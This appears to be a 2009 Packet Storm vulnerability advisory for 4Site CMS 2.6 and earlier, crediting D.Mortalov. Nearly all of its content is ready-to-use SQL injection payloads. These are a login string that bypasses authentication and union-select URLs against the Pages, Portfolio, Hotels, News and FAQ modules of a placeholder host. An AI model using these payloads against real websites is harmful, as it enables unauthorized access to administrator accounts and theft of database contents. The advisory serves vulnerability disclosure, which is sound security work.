4Site CMS 2.6 SQL Injection

2009-02-03T00:00:00
ID PACKETSTORM:74593
Type packetstorm
Reporter D.Mortalov
Modified 2009-02-03T00:00:00

Description

                                        
                                            `[WSEC-09-002] 4Site CMS <= 2.6 Multiple Remote SQL Injections  
  
  
Developer site: http://www.4site.ru/  
  
Discovered by D.Mortalov // wsec.ru  
  
  
1. Auth Bypass  
  
Login: 1'or'1  
Password: 1'or’1  
  
  
2. Multiple Remote SQL Injections in 4site CMS modules  
  
"Pages" module:  
http://vulnerable.site/print/print.shtml?page=-1+union+select+1  
  
"Portfolio" module:  
http://vulnerable.site/portfolio/index.shtml?s=1&i=-1+union+select+1,2,3,4,5,6,7,8,9  
http://vulnerable.site/portfolio/index.shtml?s=-1+union+select+1  
  
"Hotels" module:  
http://vulnerable.site/hotel/?h=-1+union+select+1  
  
"News" module:  
http://vulnerable.site/news/news1.shtml?id=-1+union+select+1,2,3,4  
  
"FAQ" module:  
http://vulnerable.site/faq/index.shtml?th=-1+union+select+1  
  
  
`